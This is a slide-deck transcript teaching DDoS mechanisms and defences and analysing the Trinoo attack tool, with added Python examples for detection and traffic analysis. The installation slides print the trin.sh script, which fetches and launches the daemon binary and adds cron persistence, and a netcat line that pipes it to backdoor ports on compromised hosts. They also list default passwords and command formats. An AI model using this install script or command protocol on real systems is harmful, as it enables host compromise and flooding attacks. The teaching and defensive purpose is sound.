An Introduction to DDoS - PowerPoint PPT Presentation


1
An Introduction to DDoS
  • And the Trinoo Attack Tool

Prepared by Ray Lam and Ivan Wong, July 10, 2003
2
Outline
  • Background on DDoS
      • Attack mechanism
      • Ways to defend
  • The attack tool Trinoo
      • Introduction
      • Attack scenario
      • Symptoms and defense
      • Weaknesses and next evolution

3
Background on DDoS
  • Attack mechanism

4
Denial-of-Service
  • Flooding-based: send packets to the victim to exhaust its
      • Network resources
      • System resources
  • Traditional DoS
      • One attacker
  • Distributed DoS
      • Countless attackers

5
Attack Mechanism
  • Direct Attack
  • Reflector Attack

[Figure: the two patterns. A = attacker, R = reflector (or the address the attacker spoofs), V = victim]
  Direct attack:    A -> V : TCP SYN, ICMP, UDP... with R's address as the source IP address
                    V -> R : TCP SYN-ACK, TCP RST, ICMP, UDP... (the victim's replies go to the spoofed address)
  Reflector attack: A -> R : TCP SYN, ICMP, UDP... with V's address as the source IP address
                    R -> V : TCP SYN-ACK, TCP RST, ICMP, UDP... (the reflector's replies flood the victim)
6
Attack Architecture

[Figure: the two architectures side by side]
  Direct attack:    Attacker (A) -> Masters (handlers) -> Agents (daemons or zombies) -> Victim (V)
                    The agents send TCP SYN, ICMP, UDP... packets; the source IP addresses are usually spoofed.
  Reflector attack: Attacker (A) -> Masters (handlers) -> Agents (daemons or zombies) -> Reflectors -> Victim (V)
                    The agents send TCP SYN, ICMP, UDP... packets with V's address as the source IP address;
                    the reflectors answer V with TCP SYN-ACK, TCP RST, ICMP, UDP... packets.
7
Attack Methods

  Attack method        Attack packets                              Reply packets
  Smurf                ICMP echo queries to broadcast address      ICMP echo replies
  SYN flooding         TCP SYN packets                             TCP SYN-ACK packets
  RST flooding         TCP packets to closed ports                 TCP RST packets
  ICMP flooding        ICMP queries                                ICMP replies
                       UDP packets to closed ports                 ICMP port unreachable
                       IP packets with low TTL                     ICMP time exceeded
  DNS reply flooding   DNS queries (recursive) to DNS servers      DNS replies
8
Backscatter Analysis (Moore et al.)
  • Measured DoS activity on the Internet
  • TCP (94%)
  • UDP (2%)
  • ICMP (2%)
  • TCP attacks based mainly on SYN flooding
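How these numbers are obtained, as an added worked example (illustrative code written for this page, not the slides' material or Moore et al.'s software). A network telescope, an unused address block that plays the role of R in the direct-attack figure, receives the replies a victim sends to spoofed sources; each unsolicited reply names a victim (the packet source) and its type says which flood caused it. The /24 telescope block, the one-second capture, the victim addresses and the tuple layout are constructed assumptions.

```python
# Added example, not from the slides: backscatter classification in the style
# of Moore et al.  Every unsolicited reply arriving in the telescope names a
# victim (the packet *source*); the reply type says which flood caused it.
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

TELESCOPE = ip_network("203.0.113.0/24")   # assumed monitored block (constructed)

# Reply type seen at the telescope -> protocol of the flood that provoked it.
REPLY_TO_ATTACK = {
    ("tcp", "SA"): "tcp",                   # SYN-ACK: victim answered a spoofed SYN
    ("tcp", "R"): "tcp",                    # RST: spoofed segment hit a closed port
    ("tcp", "RA"): "tcp",
    ("icmp", "port-unreachable"): "udp",    # UDP flood to closed ports
    ("icmp", "echo-reply"): "icmp",         # ICMP echo flood
    ("icmp", "time-exceeded"): "ip-low-ttl",
}

def is_backscatter(pkt):
    """A packet is backscatter if it lands in the telescope and is a reply type
    that nothing inside the telescope could have solicited."""
    src, dst, proto, detail = pkt
    return ip_address(dst) in TELESCOPE and (proto, detail) in REPLY_TO_ATTACK

def group_by_victim(packets):
    """Map victim address -> Counter of inferred attack protocols."""
    per_victim = defaultdict(Counter)
    for pkt in packets:
        if is_backscatter(pkt):
            src, _dst, proto, detail = pkt
            per_victim[src][REPLY_TO_ATTACK[(proto, detail)]] += 1
    return per_victim

def protocol_share(per_victim):
    """Percentage of backscatter per attack protocol (the TCP/UDP/ICMP split above)."""
    total = Counter()
    for counts in per_victim.values():
        total.update(counts)
    n = sum(total.values())
    return {proto: round(100.0 * k / n, 1) for proto, k in total.items()} if n else {}

def estimated_reply_rate(per_victim, victim, window_seconds=1.0):
    """Scale what the telescope saw up to the whole IPv4 space: with uniformly
    random spoofed sources, a /24 receives 256/2^32 of all replies."""
    fraction = TELESCOPE.num_addresses / 2 ** 32
    return sum(per_victim[victim].values()) / fraction / window_seconds

# Constructed one-second capture: (src, dst, proto, tcp flags or icmp type).
SAMPLE = [
    ("198.51.100.7", "203.0.113.9", "tcp", "SA"),
    ("198.51.100.7", "203.0.113.21", "tcp", "SA"),
    ("198.51.100.7", "203.0.113.88", "tcp", "R"),
    ("198.51.100.7", "203.0.113.3", "tcp", "SA"),
    ("192.0.2.44", "203.0.113.50", "icmp", "port-unreachable"),
    ("192.0.2.44", "203.0.113.51", "icmp", "port-unreachable"),
    ("192.0.2.9", "203.0.113.10", "icmp", "echo-reply"),
    ("198.51.100.7", "203.0.113.9", "tcp", "S"),     # a SYN *into* the telescope is a scan, not backscatter
    ("203.0.113.200", "198.51.100.7", "tcp", "SA"),  # not addressed to the telescope
]

if __name__ == "__main__":
    victims = group_by_victim(SAMPLE)
    for v, counts in victims.items():
        print(v, dict(counts), f"~{estimated_reply_rate(victims, v):.0f} replies/s")
    print(protocol_share(victims))
```

The extrapolated rate rests on the same assumption Moore et al. make, that the attacker picks spoofed sources uniformly over the whole address space. A reflector attack breaks it: the reflectors' replies go to the victim, not to random addresses, so a telescope never sees that attack at all.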

9
Background on DDoS
  • Ways to defend

10
Strategy
  • Three lines of defense
      • Attack prevention: before the attack
      • Attack detection and filtering: during the attack
      • Attack source traceback: during and after the attack

11
Attack prevention
  • Protect hosts from installation of masters and
    agents by attackers
  • Scan hosts for symptoms of agents being installed
  • Monitor network traffic for known message
    exchanges among attackers, masters, agents

12
Attack prevention
  • Inadequate and hard to deploy
      • Users who don't care leave security holes
      • ISPs and enterprise networks have no incentive to do it

13
Attack source traceback
  • Identify the actual origin of a packet
      • Without relying on the packet's source IP
  • Two approaches
      • Routers record information about the packets they forward
      • Routers send additional information about the packets to the destination

14
Attack source traceback
  • Source traceback cannot stop an ongoing DDoS attack
  • Cannot trace origins behind firewalls or NAT (network address translators)
  • Harder for reflector attacks: the packets that reach the victim come from legitimate sources (the reflectors)
  • Useful for post-attack law enforcement

15
Attack detection and filtering
  • Detection
      • Identify the DDoS attack and the attack packets
  • Filtering
      • Classify packets as normal or attack
      • Drop the attack packets

16
Attack detection and filtering
  • Can be done in 4 places
      • Victim's network
      • Victim's ISP network
      • Further upstream ISP networks
      • Attack source networks
  • Dispersed agents send packets to a single victim
      • Like pouring packets into the top of a funnel

17
Attack detection and filtering

[Figure: the funnel, from the attack source networks at the top, through further
upstream ISP networks and the victim's ISP network, to the victim's network and
the victim at the bottom. Effectiveness of detection increases towards the
victim; effectiveness of filtering increases towards the attack sources.]
18
Attack detection and filtering
  • Detection
      • Easy at the victim's network: large volume of attack packets
      • Difficult at an individual agent's network: small volume of attack packets
  • Filtering
      • Effective at the agents' networks: less likely to drop normal packets
      • Ineffective at the victim's network: more normal packets are dropped

19
DF (detection and filtering) at agents' networks
  • Usually cannot detect a DDoS attack
  • Can filter attack packets with spoofed source addresses (ingress filtering)
      • Attack packets in direct attacks
      • Attack packets from agents to reflectors in reflector attacks
  • Ensuring that all ISPs deploy ingress packet filtering is impossible
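Ingress filtering at the border of an agent's network, as an added example (illustrative code for this page, not something from the slides). The stub network's prefixes, the reflector address and the outbound packets are constructed. The Trinoo line is there for the caveat: the original Trinoo daemon sends its UDP flood from an ordinary socket with the agent's real source address (a property of the tool, not something the slides state), so this filter does not touch it, which is exactly why the slide says detection at the source is usually impossible.

```python
# Added example, not from the slides: BCP 38-style ingress (egress) filtering
# at the edge of a stub network.  A packet may leave only if its source address
# belongs to the network; any other source is spoofed and the packet is dropped.
from ipaddress import ip_address, ip_network

STUB_PREFIXES = [ip_network("192.0.2.0/24"), ip_network("198.51.100.128/25")]  # assumed

def source_is_ours(src, prefixes=STUB_PREFIXES):
    """True when src lies inside one of the stub network's own prefixes."""
    addr = ip_address(src)
    return any(addr in prefix for prefix in prefixes)

def ingress_filter(packets, prefixes=STUB_PREFIXES):
    """Split outbound (src, dst, proto, note) tuples into (forwarded, dropped)."""
    forwarded, dropped = [], []
    for pkt in packets:
        (forwarded if source_is_ours(pkt[0], prefixes) else dropped).append(pkt)
    return forwarded, dropped

VICTIM = "203.0.113.10"
REFLECTOR = "198.51.100.1"       # any host outside the stub that answers (constructed)
OUTBOUND = [                     # constructed traffic leaving the stub network
    ("10.77.1.1", VICTIM, "tcp-syn", "direct attack, random spoofed source"),
    (VICTIM, REFLECTOR, "tcp-syn", "reflector attack, first leg: spoofed as the victim"),
    ("192.0.2.17", VICTIM, "udp", "Trinoo-style UDP flood with the agent's real address"),
    ("192.0.2.25", "198.51.100.53", "udp", "legitimate DNS query"),
]

if __name__ == "__main__":
    forwarded, dropped = ingress_filter(OUTBOUND)
    for pkt in dropped:
        print("DROP", pkt)
    for pkt in forwarded:
        print("PASS", pkt)
```

Both spoofed packets are dropped, which covers the two cases the slide lists: the direct attack's forged source and the agent-to-reflector leg forged as the victim. The unspoofed flood and the DNS query both pass; at this vantage point nothing in the filter can tell them apart.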

20
DF at the victim's network
  • Can detect the DDoS attack
      • Unusually high volume of incoming traffic of certain packet types
      • Degraded server and network performance
  • Filtering is ineffective
      • Attack and normal packets have the same destination: the victim's IP and port
      • Attack packets have spoofed source IPs or come from many different IPs
      • Attack and normal packets are indistinguishable

21
DF at the victim's upstream ISP
  • Often requested by the victim to filter attack packets
      • Alert protocol: the victim may not be able to receive the ISP's ACK (its link is saturated by the attack)
      • Requires strong authentication and encryption
  • Filtering may still be ineffective
      • The ISP's network may also be jammed

22
DF at further upstream ISPs
  • Backpressure approach
      • Victim detects the DDoS attack
      • Upstream ISPs filter the attack packets

23
The attack tool Trinoo
  • Introduction

24
Introduction
  • Discovered in August 1999
  • Daemons found on Solaris 2.x systems
  • Used to attack a system at the University of Minnesota
      • Victim unusable for 2 days

25
Attack type
  • UDP flooding
  • Default size of UDP packet: 1000 bytes
      • malloc() a buffer of this size and send its uninitialized content
  • Default period of attack: 120 seconds
  • Destination port randomly chosen from 0 to 65534
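A victim-side detector for exactly this flood shape (many UDP datagrams of one fixed size to random destination ports, from several agents at once), as an added example; this is illustrative code for this page, not part of the slides. The agent addresses, the generated traffic, the benign baseline and the thresholds are assumptions.

```python
# Added example, not from the slides: per-destination UDP profiling that picks
# out the Trinoo flood pattern (fixed 1000-byte datagrams to random ports).
import random
from collections import Counter

VICTIM = "203.0.113.10"
DEFAULT_SIZE = 1000                    # Trinoo default UDP payload size

def trinoo_flood(agents, victim, per_agent, seed=7):
    """Constructed sample of one second of Trinoo-style traffic: each agent
    sends `per_agent` datagrams of DEFAULT_SIZE bytes to random ports 0..65534."""
    rng = random.Random(seed)
    return [(agent, victim, rng.randint(0, 65534), DEFAULT_SIZE)
            for _ in range(per_agent) for agent in agents]

def normal_udp(victim):
    """Constructed sample of benign UDP: DNS (53) and NTP (123), varied sizes."""
    return [("192.0.2.%d" % (i % 5 + 1), victim, 53 if i % 2 else 123, 60 + 3 * i)
            for i in range(20)]

def udp_profile(packets, dst):
    """Profile of one capture window for one destination.  packets are
    (src, dst, dport, size) tuples; the result holds what the decision needs."""
    sizes, ports, sources = Counter(), set(), set()
    for src, d, dport, size in packets:
        if d != dst:
            continue
        sizes[size] += 1
        ports.add(dport)
        sources.add(src)
    count = sum(sizes.values())
    top_size, top_n = sizes.most_common(1)[0] if count else (None, 0)
    return {"count": count, "sources": len(sources), "ports": len(ports),
            "top_size": top_size, "top_size_share": top_n / count if count else 0.0}

def is_udp_flood(profile, min_rate=1000, min_ports=200, min_size_share=0.9):
    """Flag a window as a Trinoo-style flood: high packet rate, datagrams spread
    over many destination ports (random ports hit no service), one dominant size.
    A busy DNS server also has a high rate, but its traffic sits on port 53,
    which is why the port spread matters more than the rate alone."""
    return (profile["count"] >= min_rate and profile["ports"] >= min_ports
            and profile["top_size_share"] >= min_size_share)

if __name__ == "__main__":
    agents = ["198.51.100.2", "198.51.100.3", "198.51.100.4"]
    window = normal_udp(VICTIM) + trinoo_flood(agents, VICTIM, 500)
    profile = udp_profile(window, VICTIM)
    print(profile, "flood" if is_udp_flood(profile) else "normal")
```

The port spread is what makes this flood separable at the victim even though the sources are many real addresses: datagrams to ports where nothing listens can be rate-limited without touching the DNS and NTP traffic, which is the "single defense tool" the weaknesses section later refers to.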

26
The attack tool Trinoo
  • Attack scenario

27
Installation
  • Hack an account
      • Acts as repository
      • Scanning tools, attack tools, Trinoo daemons, Trinoo masters, etc.
  • Requirements
      • High-bandwidth connection
      • Large number of users
      • Little administrative oversight

28
Installation
  • Compromise systems
      • Look for vulnerable systems (unpatched Sun Solaris and Linux)
      • Remote buffer overflow exploitation
      • Set up a root account
      • Open TCP ports
      • Keep a friend list

29
Installation
  • Install daemons
      • Use netcat (nc) and trin.sh
  • netcat
      • Network version of cat
  • trin.sh
      • Shell script to set up daemons

./trin.sh | nc 128.aaa.167.217 1524
./trin.sh | nc 128.aaa.167.218 1524
30
Installation
  • trin.sh

echo "rcp 192.168.0.1:leaf /usr/sbin/rpc.listen"
echo "echo rcp is done moving binary"
echo "chmod +x /usr/sbin/rpc.listen"
echo "echo launching trinoo"
echo "/usr/sbin/rpc.listen"
echo "echo \* \* \* \* \* /usr/sbin/rpc.listen > cron"
echo "crontab cron"
echo "echo launched"
echo "exit"
31
Architecture

[Figure: direct attack. Attacker -> Masters (handlers) -> Agents (daemons or zombies) -> Victim]
32
Communication ports
  • Monitor specific ports to detect the presence of a master or agent

[Figure: Attacker -> Master over TCP port 27665;
         Master -> Daemon over UDP port 27444;
         Daemon -> Master over UDP port 31335]
33
Password protection
  • Passwords prevent administrators or other hackers from taking control
  • Encrypted password compiled into master and daemon using crypt()
  • The clear-text password is sent over the network; the session is not encrypted
  • The received password is encrypted with crypt() and compared with the compiled-in value

34
Password protection
  • Default passwords
      • l44adsl: trinoo daemon password
      • gOrave: trinoo master server startup
      • betaalmostdone: trinoo master remote interface password
      • killme: trinoo master password to control the mdie command

35
Login to master
  • Telnet to port 27665 of the host running the master
  • Enter the password betaalmostdone
  • Warns if others try to connect to the master

[root@r2 /root]# telnet r1 27665
Trying 192.168.249.201...
Connected to r1.router (192.168.249.201).
Escape character is '^]'.
betaalmostdone
trinoo v1.07d2+f3+c..rpm8d/c b4Sx/
trinoo>
36
Master and daemon
  • Communicate by UDP packets
  • Command line format
      • <arg1> <password> <arg2>
      • Default password is l44adsl
  • When a daemon starts, it sends HELLO to the master
  • The master maintains a list of daemons

37
Master commands
  • dos IP
      • DoS the IP address specified
      • "aaa l44adsl IP" is sent to each daemon
  • mdos <ip1:ip2:ip3>
      • DoS the IPs simultaneously
  • mtimer N
      • Set attack period to N seconds

38
Master commands
  • bcast
      • List all daemons' IPs
  • mdie password
      • Shut down all daemons
  • killdead
      • Invite all daemons to send HELLO to the master
      • Delete all dead daemons from the list

39
Daemon commands
  • Not used directly; only the master sends them to the daemons
  • Consist of 3 letters
      • Shorter than the 4-character minimum that the Unix strings command prints by default, so a plain strings run on the binary does not expose them

40
Daemon commands
  • aaa password IP
      • DoS the specified IP
  • bbb password N
      • Set attack period to N seconds
  • rsz password N
      • Set attack packet size to N bytes

41
The attack tool Trinoo
  • Symptoms and defense

42
Symptoms
  • Masters
      • Crontab
      • Friend list: files ... and ...-b
      • Binary name, e.g. /usr/sbin/rpc.listen

# ls -l ... ...-b
-rw-------   1 root     root           25 Sep 26 14:46 ...
-rw-------   1 root     root           50 Sep 26 14:30 ...-b
43
Symptoms
  • Masters (cont.)
      • Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:27665                 *:*                     LISTEN
. . .
udp        0      0 *:31335                 *:*
. . .
44
Symptoms
  • Masters (cont.)
      • File status

# lsof | egrep "31335|27665"
master    1292     root    3u  inet   2460       UDP *:31335
master    1292     root    4u  inet   2461       TCP *:27665 (LISTEN)
# lsof -p 1292
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
master  1292 root  cwd    DIR    3,1    1024  14356 /tmp/...
master  1292 root  rtd    DIR    3,1    1024      2 /
master  1292 root  txt    REG    3,1   30492  14357 /tmp/.../master
master  1292 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
master  1292 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
45
Symptoms
  • Daemons
      • Socket status

# netstat -a --inet
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
. . .
udp        0      0 *:1024                  *:*
udp        0      0 *:27444                 *:*
. . .
46
Symptoms
  • Daemons (cont.)
      • File status

# lsof | egrep "27444"
ns        1316     root    3u  inet   2502       UDP *:27444
# lsof -p 1316
COMMAND  PID USER   FD   TYPE DEVICE    SIZE   NODE NAME
ns      1316 root  cwd    DIR    3,1    1024 153694 /tmp/...
ns      1316 root  rtd    DIR    3,1    1024      2 /
ns      1316 root  txt    REG    3,1    6156 153711 /tmp/.../ns
ns      1316 root  mem    REG    3,1  342206  28976 /lib/ld-2.1.1.so
ns      1316 root  mem    REG    3,1   63878  29116 /lib/libcrypt-2.1.1.so
ns      1316 root  mem    REG    3,1 4016683  29115 /lib/libc-2.1.1.so
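The host checks of the symptoms slides done as parsers over the command output rather than by running the commands, as an added example (illustrative code for this page, not a tool from the slides). The netstat, lsof and crontab text is constructed to match the slide listings; the regular expressions, the role logic and the function names are assumptions, and real output from these commands can be piped in instead.

```python
# Added example, not from the slides: find the Trinoo master/daemon signs from
# `netstat -a --inet`, `lsof` and `crontab -l` output (parsed as text).
import re

MASTER_PORTS = {("tcp", 27665), ("udp", 31335)}      # attacker->master, daemon->master
DAEMON_PORTS = {("udp", 27444)}                      # master->daemon
TRINOO_PORTS = MASTER_PORTS | DAEMON_PORTS

NETSTAT_RE = re.compile(r"^(tcp|udp)\s+\d+\s+\d+\s+\S+:(\d+)\s")
LSOF_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\d+[urw]\s+inet\s+\d+\s+(TCP|UDP)\s+\S*:(\d+)")
CRON_RE = re.compile(r"^\*\s+\*\s+\*\s+\*\s+\*\s+(\S+)")    # every-minute restart line

def listening_ports(netstat_text):
    """(proto, port) pairs from netstat lines."""
    found = set()
    for line in netstat_text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            found.add((m.group(1), int(m.group(2))))
    return found

def socket_owners(lsof_text):
    """(proto, port) -> (command, pid) from lsof lines in the slide's format."""
    owners = {}
    for line in lsof_text.splitlines():
        m = LSOF_RE.match(line)
        if m:
            owners[(m.group(3).lower(), int(m.group(4)))] = (m.group(1), int(m.group(2)))
    return owners

def cron_restarts(crontab_text):
    """Programs a crontab re-launches every minute, the trin.sh pattern."""
    return [m.group(1) for m in map(CRON_RE.match, crontab_text.splitlines()) if m]

def trinoo_report(netstat_text, lsof_text, crontab_text):
    """Summarise which Trinoo ports are open, who owns them, and what cron restarts."""
    ports = listening_ports(netstat_text) & TRINOO_PORTS
    owners = socket_owners(lsof_text)
    role = ("master" if ports & MASTER_PORTS else "") + ("daemon" if ports & DAEMON_PORTS else "")
    return {
        "role": role or "none",
        "ports": sorted(ports),
        "processes": sorted({owners[p] for p in ports if p in owners}),
        "cron": cron_restarts(crontab_text),
    }

# Constructed samples in the format of the slide listings.
NETSTAT_SAMPLE = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 *:22                    *:*                     LISTEN
tcp        0      0 *:27665                 *:*                     LISTEN
udp        0      0 *:31335                 *:*
udp        0      0 *:53                    *:*
"""
LSOF_SAMPLE = """\
master    1292     root    3u  inet   2460       UDP *:31335
master    1292     root    4u  inet   2461       TCP *:27665 (LISTEN)
named      812    named    5u  inet   1107       UDP *:53
"""
CRONTAB_SAMPLE = "* * * * * /usr/sbin/rpc.listen\n"

if __name__ == "__main__":
    print(trinoo_report(NETSTAT_SAMPLE, LSOF_SAMPLE, CRONTAB_SAMPLE))
```

The port numbers are an indicator, not proof: a normal program may use them (the trade-off the next slide mentions) and anyone who recompiles Trinoo can change them and the binary names, so the confirming step is the strings check on the binary described under "Weaknesses".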
47
Defenses
  • Prevent root-level compromise
      • Patch systems
      • Set up firewalls
  • Monitor traffic
  • Block abused ports
      • High-numbered UDP ports
      • Trade-off: also blocks normal programs using the same ports

48
The attack tool Trinoo
  • Weaknesses and next evolution

49
Weaknesses
  • Single kind of attack
      • UDP flooding
      • Easily defended by a single defense tool
  • Targets are specified by IP address
      • Moving-target defense: the victim changes its IP address to avoid the attack

50
Weaknesses
  • Passwords, encrypted passwords and commands are visible in the binary images
      • Obtain them with the Unix strings command: strings master; strings -n 3 ns
      • Check whether Trinoo is present
      • Crack the encrypted passwords

51
Weaknesses
  • Passwords travel in plain text over the network
      • The daemon password is sent frequently: it is part of every master-to-daemon command
      • Capture it with ngrep or tcpdump, which show the UDP payload
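The master/daemon exchange from the "Master and daemon", "Master commands" and "Daemon commands" slides and the wire-level exposure this slide points at, together in one added example (illustrative code written for this page, not the Trinoo sources). The port numbers and the default daemon password are the ones the slides give, and the "*HELLO*" spelling of the daemon's start-up message follows Dittrich's analysis cited in the references; the addresses, the datagram tuple layout, the direct string comparison standing in for crypt(), and the sample session are assumptions.

```python
# Added example, not from the slides or the Trinoo sources: the master->daemon
# command format, the daemon's handling of it, and an ngrep-style sniffer that
# harvests the clear-text daemon password from the same datagrams.
import re
from ipaddress import ip_address

PORT_MASTER_TO_DAEMON = 27444     # UDP, master -> daemon
PORT_DAEMON_TO_MASTER = 31335     # UDP, daemon -> master
DAEMON_PASSWORD = "l44adsl"        # default daemon password from the slides
HELLO = "*HELLO*"                  # daemon start-up message as Dittrich's analysis prints it

# Master side: one operator command -> the "<cmd> <password> <arg>" datagrams
# sent to every daemon on the master's list.
def master_to_daemon(command, daemons, password=DAEMON_PASSWORD):
    verb, *args = command.split()
    if verb == "dos":                                   # dos IP
        payloads = [f"aaa {password} {args[0]}"]
    elif verb == "mdos":                                # mdos <ip1:ip2:ip3>
        payloads = [f"aaa {password} {ip}" for ip in args[0].strip("<>").split(":")]
    elif verb == "mtimer":                              # mtimer N
        payloads = [f"bbb {password} {args[0]}"]
    else:
        raise ValueError(f"not modelled here: {verb}")
    return [(daemon, PORT_MASTER_TO_DAEMON, p) for daemon in daemons for p in payloads]

# Daemon side.  The real daemon runs crypt() on the received password and
# compares it with the hash compiled into the binary; a direct string
# comparison stands in for that here (assumption).
CMD_RE = re.compile(r"^(?P<verb>[a-z0-9]{3}) (?P<password>\S+)(?: (?P<arg>\S+))?$")

def daemon_handle(payload, state, password=DAEMON_PASSWORD):
    """Apply one datagram to the daemon's attack state; return the verb accepted, else None."""
    m = CMD_RE.match(payload)
    if not m or m["password"] != password:
        return None
    verb, arg = m["verb"], m["arg"]
    if verb == "aaa":
        state["targets"].append(str(ip_address(arg)))   # DoS the given IP
    elif verb == "bbb":
        state["period"] = int(arg)                      # attack period in seconds
    elif verb == "rsz":
        state["size"] = int(arg)                        # attack packet size in bytes
    else:
        return None
    return verb

# Network side: the password crosses the wire in clear text in every
# master->daemon command, so a sniffer on that port harvests it.
def sniff(datagrams):
    """datagrams: (src, sport, dst, dport, payload).  Returns (findings, passwords)."""
    findings, passwords = [], set()
    for src, sport, dst, dport, payload in datagrams:
        if dport == PORT_MASTER_TO_DAEMON and (m := CMD_RE.match(payload)):
            passwords.add(m["password"])
            findings.append(("master->daemon", src, dst, m["verb"], m["arg"]))
        elif dport == PORT_DAEMON_TO_MASTER and payload == HELLO:
            findings.append(("daemon->master", src, dst, "hello", None))
    return findings, passwords

def demo():
    """Constructed session: two daemons register, the master issues mdos and mtimer."""
    master, daemons = "10.0.0.1", ["10.0.0.2", "10.0.0.3"]
    wire = [(d, 1024, master, PORT_DAEMON_TO_MASTER, HELLO) for d in daemons]
    for cmd in ("mdos <192.0.2.10:192.0.2.11>", "mtimer 120"):
        wire += [(master, 1025, d, port, p) for d, port, p in master_to_daemon(cmd, daemons)]
    wire.append(("10.0.0.9", 40000, "10.0.0.53", 53, "benign dns, not trinoo"))
    state = {"targets": [], "period": 120, "size": 1000}     # daemon defaults from the slides
    for src, _sport, dst, dport, payload in wire:
        if dst == daemons[0] and dport == PORT_MASTER_TO_DAEMON:
            daemon_handle(payload, state)
    return state, sniff(wire)

if __name__ == "__main__":
    print(demo())
```

Because every command carries the password, a single captured "aaa" datagram is enough to take over the daemons, and the same three-letter pattern on UDP port 27444 is what a network monitor can alert on.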

52
Uproot a Trinoo network
  • Locate a daemon
      • Use strings to obtain the IPs of the masters
  • Contact the sites with masters installed
      • Those sites check their list of daemons, by inspecting the file or by getting the master login password and using the bcast command
  • Get the mdie password
      • Use mdie to shut down all daemons
      • Repeat mdie periodically, since crontab restarts the daemons

53
Next evolution
  • Combination of several attack types
      • SYN flood, UDP flood, ICMP flood
      • Higher chance of a successful attack
  • Stronger encryption of embedded strings and passwords
  • Use an encrypted communication channel
  • Communicate over a protocol that is hard to detect or block, e.g. ICMP

54
References
  • R. Chang, "Defending against Flooding-Based Distributed Denial-of-Service Attacks: A Tutorial", Oct. 2002
  • D. Dittrich, "The DoS Project's 'trinoo' Distributed Denial of Service Attack Tool",
    http://staff.washington.edu/dittrich/misc/trinoo.analysis.txt, Oct. 1999

55
Open Discussion